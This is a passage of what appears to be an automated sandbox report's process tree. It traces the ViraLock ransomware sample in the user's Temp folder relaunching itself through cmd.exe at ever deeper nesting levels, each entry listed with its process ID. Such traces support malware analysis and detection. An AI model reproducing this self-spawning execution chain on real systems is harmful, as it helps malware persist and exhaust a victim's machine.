        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        46⤵
        
        PID:2392
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        47⤵
        
        PID:3652
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        48⤵
        
        PID:2660
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        49⤵
        
        PID:3284
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        50⤵
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        51⤵
        
        PID:4608
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        52⤵
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        53⤵
        
        PID:4348
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        54⤵
        
        PID:1320
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        55⤵
        
        PID:1152
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        56⤵
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        57⤵
        
        PID:648
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        58⤵
        
        PID:1616
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        59⤵
        
        PID:4700
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        60⤵
        
        PID:2164
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        61⤵
        
        PID:2716
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        62⤵
        
        PID:5036
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        63⤵
        
        PID:4884
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        64⤵
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        65⤵
        
        PID:3132
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        66⤵
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        67⤵
        
        PID:3640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        68⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        69⤵
        
        PID:4008
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        70⤵
        
        PID:3008
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        71⤵
        
        PID:4512
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        72⤵
        
        PID:4116
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        73⤵
        
        PID:3276
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        74⤵
        
        PID:1228
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        75⤵
        
        PID:4608
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        76⤵
        
        PID:3868
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        77⤵
        
        PID:3712
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        78⤵
        
        PID:2928
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        79⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        80⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        81⤵
        
        PID:2292
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        82⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        83⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        84⤵
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        85⤵
        
        PID:2268
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        86⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        87⤵
        
        PID:4168
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        88⤵
        
        PID:3520
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        89⤵
        
        PID:896
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        90⤵
        
        PID:1884
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        91⤵
        
        PID:1600
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        92⤵
        
        PID:2160
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        93⤵
        
        PID:1392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        94⤵
        
        PID:4120
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        95⤵
        
        PID:904
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        96⤵
        
        PID:3592
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        97⤵
        
        PID:3232
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        98⤵
        
        PID:3556
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        99⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        100⤵
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        101⤵
        
        PID:4596
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        102⤵
        
        PID:3852
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        103⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        104⤵
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        105⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        106⤵
        
        PID:4452
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        107⤵
        
        PID:968
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        108⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        109⤵
        
        PID:1008
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        110⤵
        
        PID:3984
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        111⤵
        
        PID:4132
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        112⤵
        
        PID:2796
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        113⤵
        
        PID:3928
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        114⤵
        
        PID:4660
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        115⤵
        
        PID:2060
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        116⤵
        
        PID:1420
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        117⤵
        
        PID:3044
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        118⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        119⤵
        
        PID:2508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        120⤵
        
        PID:3336
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        121⤵
        
        PID:3784
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        122⤵
        
        PID:844
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        123⤵
        
        PID:3356
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        124⤵
        
        PID:3620
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        125⤵
        
        PID:1436
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        126⤵
        
        PID:1792
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        127⤵
        
        PID:1452
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        128⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        129⤵
        
        PID:2884
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        130⤵
        
        PID:1044
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        131⤵
        
        PID:2308
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        132⤵
        
        PID:5084
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        133⤵
        
        PID:772
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        134⤵
        
        PID:4956
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        135⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        136⤵
        
        PID:4840
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        137⤵
        
        PID:4392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        138⤵
        
        PID:3008
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        139⤵
        
        PID:4456
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        140⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        141⤵
        
        PID:684
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        142⤵
        
        PID:3032
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        143⤵
        
        PID:4008
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        144⤵
        
        PID:4172
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        145⤵
        
        PID:4508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        146⤵
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        147⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        148⤵
        
        PID:2924
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        149⤵
        
        PID:1640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        150⤵
        
        PID:3636
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        151⤵
        
        PID:3856
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        152⤵
        
        PID:1380
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        153⤵
        
        PID:3164
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        154⤵
        
        PID:1860
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        155⤵
        
        PID:4392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        156⤵
        
        PID:1660
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        157⤵
        
        PID:4828
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        158⤵
        
        PID:1080
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        159⤵
        
        PID:2228
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        160⤵
        
        PID:3436
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        161⤵
        
        PID:2292
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        162⤵
        
        PID:3832
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        163⤵
        
        PID:2524
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        164⤵
        
        PID:4800
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        165⤵
        
        PID:2064
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        166⤵
        
        PID:3172
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        167⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        168⤵
        
        PID:1320
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        169⤵
        
        PID:2392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        170⤵
        
        PID:4456
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        171⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        172⤵
        
        PID:2744
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        173⤵
        
        PID:1328
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        174⤵
        
        PID:2064
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        175⤵
        
        PID:4164
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        175⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        176⤵
        
        PID:4976
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        177⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        178⤵
        
        PID:952
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        179⤵
        
        PID:2944
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        180⤵
        
        PID:4588
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        181⤵
        
        PID:1412
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        182⤵
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        183⤵
        
        PID:3448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        184⤵
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        185⤵
        
        PID:388
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        186⤵
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        187⤵
        
        PID:3796
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        188⤵
        
        PID:896
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        189⤵
        
        PID:360
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        190⤵
        
        PID:3400
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        191⤵
        
        PID:3988
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        192⤵
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        193⤵
        
        PID:696
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        194⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        195⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        196⤵
        
        PID:1552
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        197⤵
        
        PID:3240
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        198⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        199⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        200⤵
        
        PID:3796
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        201⤵
        
        PID:4008
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        202⤵
        
        PID:4336
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        203⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        204⤵
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        205⤵
        
        PID:3640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        206⤵
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        207⤵
        
        PID:1216
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        208⤵
        
        PID:3148
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        209⤵
        
        PID:1128
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        210⤵
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        211⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        212⤵
        
        PID:2428
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        213⤵
        
        PID:1140
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        214⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
